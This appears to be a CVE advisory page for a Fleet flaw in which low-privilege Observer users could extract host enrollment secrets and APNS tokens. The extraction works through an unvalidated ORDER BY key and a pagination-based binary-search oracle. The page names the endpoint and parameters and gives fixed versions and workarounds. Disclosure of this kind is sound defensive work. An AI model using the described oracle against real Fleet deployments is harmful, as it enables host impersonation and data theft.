CVE-2026-46371
published 2026-06-12CVE-2026-46371: Fleet: Observer-level enrollment secret extraction via ORDER BY oracle on Apple MDM commands endpoint ### Summary A vulnerability in Fleet's Apple MDM commands…
medium
Fleet: Observer-level enrollment secret extraction via ORDER BY oracle on Apple MDM commands endpoint ### Summary A vulnerability in Fleet's Apple MDM commands listing endpoint allowed authenticated users with the lowest-privilege Observer role to extract sensitive values from joined database tables — including host enrollment secrets and Apple Push Notification Service (APNS) tokens — through a cursor-based binary search oracle. The endpoint accepted a user-supplied `order_key` parameter that was not validated against a column allowlist. ### Impact The `GET /api/v1/fleet/mdm/apple/commands` endpoint constructs its query using a deprecated helper that did not restrict which columns could appear in the `ORDER BY` clause. The underlying query joins the `hosts` and `nano_enrollments` tables, so any column on those tables could be supplied as `order_key`. An attacker with Observer credentials could then use the cursor-based pagination parameter (`after`) to binary-search the value of the chosen column one character at a time. The targeted values never appeared in the response body, but the presence or absence of results revealed each character. With extracted `node_key` or `orbit_node_key` values, an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. The APNS values are exploitable only by a party that also possesses the organization's APNS certificate. Exploitation required authenticated Observer access and a Fleet deployment with Apple MDM enabled and at least one queued MDM command. Instances without Apple MDM configured were not affected. ### Workarounds If an immediate upgrade is not possible, administrators should: - Restrict the Observer role to fully trusted users until the patch is applied - Rotate `node_key` and `orbit_node_key` for any host suspected of exposure by re-enrolling the affected hosts ### For more information If there are any questions
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | fleetdm_fleet_v4 | >= 0 < 4.84.2 | 4.84.2 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-06-12
Published